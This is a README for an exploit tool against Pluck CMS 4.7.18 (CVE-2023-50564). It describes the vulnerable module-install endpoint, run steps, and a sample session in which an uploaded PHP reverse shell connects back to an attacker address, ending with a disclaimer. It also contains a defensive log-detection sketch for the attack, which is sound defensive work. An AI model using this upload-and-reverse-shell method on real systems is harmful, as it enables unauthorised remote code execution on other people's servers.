This script exploits an authenticated arbitrary file upload vulnerability in Pluck CMS v4.7.18 (CVE-2023-50564). By leveraging this vulnerability, an authenticated attacker can upload a malicious PHP file, enabling the execution of arbitrary code (in this case, a reverse shell).
- CVE ID: CVE-2023-50564
- Affected Version: Pluck CMS v4.7.18
- Type: Authenticated Arbitrary File Upload
- Impact: Remote Code Execution (RCE)
The vulnerability exists in the /admin.php?action=installmodule endpoint, which allows an authenticated user to upload a ZIP file containing arbitrary files. By uploading a malicious PHP file, this exploit establishes a reverse shell back to the attacker.
- Python 3.x
- requests module: pip install requests
- requests-toolbelt module: pip install requests-toolbelt
This script also requires a valid login for the Pluck CMS instance, including the target's URL and password.
- Reverse Shell: The exploit uploads a PHP reverse shell to the target and connects back to the attacker's machine.
- Interactive Command Execution: Once the reverse shell is established, commands can be executed interactively on the target.
- Password Prompt Detection: The exploit detects password prompts (e.g., su, sudo -l) and allows the user to provide input manually.
- Clone the Repository:
git clone https://github.com/yourusername/Pluck-CMS-Exploit.git
cd Pluck-CMS-Exploit
- Install Required Python Packages: Make sure the required packages are installed:
pip install requests requests-toolbelt
- Run the Exploit: The script requires four inputs: target URL, the CMS password, your IP address (for the reverse shell), and the port on which you want to listen.
Run the exploit using Python:
python3 exploit.py
- Provide Input When Prompted:
- Enter the target URL (e.g., example.com).
- Enter the password for authentication on the CMS.
- Enter your IP address for the reverse shell connection.
- Enter the port for listening to the reverse shell.
- Interactive Shell: Once the reverse shell is established, you'll be presented with a Shell> prompt to interact with the target system.
Example:
$ python3 exploit.py
Enter the target URL (e.g., example.com): pluckcms.vulnerable.com
Enter the password for target authentication: password123
Enter your IP (for reverse shell): 10.10.14.5
Enter the port to listen on (for reverse shell): 4444
[*] Authenticating to the target...
[+] Authentication successful.
[*] Generating reverse shell PHP file...
[+] Reverse shell PHP file created successfully as 'shell.php'.
[*] Creating ZIP payload...
[+] ZIP file created as 'payload.zip'.
[*] Starting reverse shell listener on 10.10.14.5:4444 ...
[*] Uploading payload to the target...
[+] Payload uploaded successfully.
[*] Triggering reverse shell at: http://pluckcms.vulnerable.com/data/modules/payload/shell.php
[+] Connection received from ('10.10.10.1', 55678)
Shell> whoami
www-data
- Authentication: The script logs into the CMS using the provided credentials.
- File Upload: It creates a ZIP archive containing a PHP reverse shell and uploads it to the vulnerable endpoint (/admin.php?action=installmodule).
- Reverse Shell: The script triggers the uploaded PHP file, establishing a reverse shell connection back to the attacker's machine.
- CVE ID: CVE-2023-50564
- Vulnerable Endpoint: /admin.php?action=installmodule
- Vulnerable Version: Pluck CMS v4.7.18
- Type: Authenticated Arbitrary File Upload
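A detection sketch for the upload-then-trigger sequence described above, added here as an example and not part of this repository's code: it flags a client that POSTs to /admin.php?action=installmodule and then requests a .php file under /data/modules/ within a short window. The combined log format, the 10-minute window, and the name find_upload_then_exec are assumptions; the sample log lines are constructed.

```python
import re
from datetime import datetime, timedelta

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [12/Mar/2024:10:01:05 +0000] "POST /admin.php?action=installmodule HTTP/1.1" 200 5120
198.51.100.7 - - [12/Mar/2024:10:01:07 +0000] "GET /data/modules/payload/shell.php HTTP/1.1" 200 0
192.0.2.44 - - [12/Mar/2024:10:05:00 +0000] "GET /data/modules/blog/blog.php HTTP/1.1" 200 812
192.0.2.9 - - [12/Mar/2024:11:00:00 +0000] "POST /admin.php?action=installmodule HTTP/1.1" 200 4096
192.0.2.9 - - [12/Mar/2024:13:30:00 +0000] "GET /data/modules/gallery/gallery.php HTTP/1.1" 200 900
"""

LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# The module-install endpoint named in the advisory details.
UPLOAD = re.compile(r'^/admin\.php\?(?:.*&)?action=installmodule(?:&|$)')
# Direct request for a PHP file inside an installed module directory.
MODULE_PHP = re.compile(r'^/data/modules/(?P<module>[^/?]+)/[^?]*\.php(?:\?|$)', re.I)


def find_upload_then_exec(log_text, window=timedelta(minutes=10)):
    """Return (ip, module, path, timestamp) for module PHP hits soon after an upload."""
    uploads = {}  # client IP -> time of its most recent accepted module upload
    alerts = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        ip, path = m["ip"], m["path"]
        accepted = m["status"].startswith(("2", "3"))
        if m["method"] == "POST" and UPLOAD.match(path) and accepted:
            uploads[ip] = ts
            continue
        hit = MODULE_PHP.match(path)
        if hit and ip in uploads and timedelta(0) <= ts - uploads[ip] <= window:
            alerts.append((ip, hit["module"], path, m["ts"]))
    return alerts


if __name__ == "__main__":
    for alert in find_upload_then_exec(SAMPLE_LOG):
        print("ALERT module upload followed by module PHP request:", alert)
```

Correlating on client IP misses a trigger request sent from a different address, so treat any installmodule POST outside a planned change as worth reviewing on its own.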
This script is intended for educational purposes and ethical hacking. It should only be used in environments where you have explicit permission to test. The author is not responsible for any misuse of this tool.
This project is licensed under the MIT License - see MIT License for details.
Feel free to fork the repository and submit pull requests. For any issues or feature requests, please open an issue on GitHub.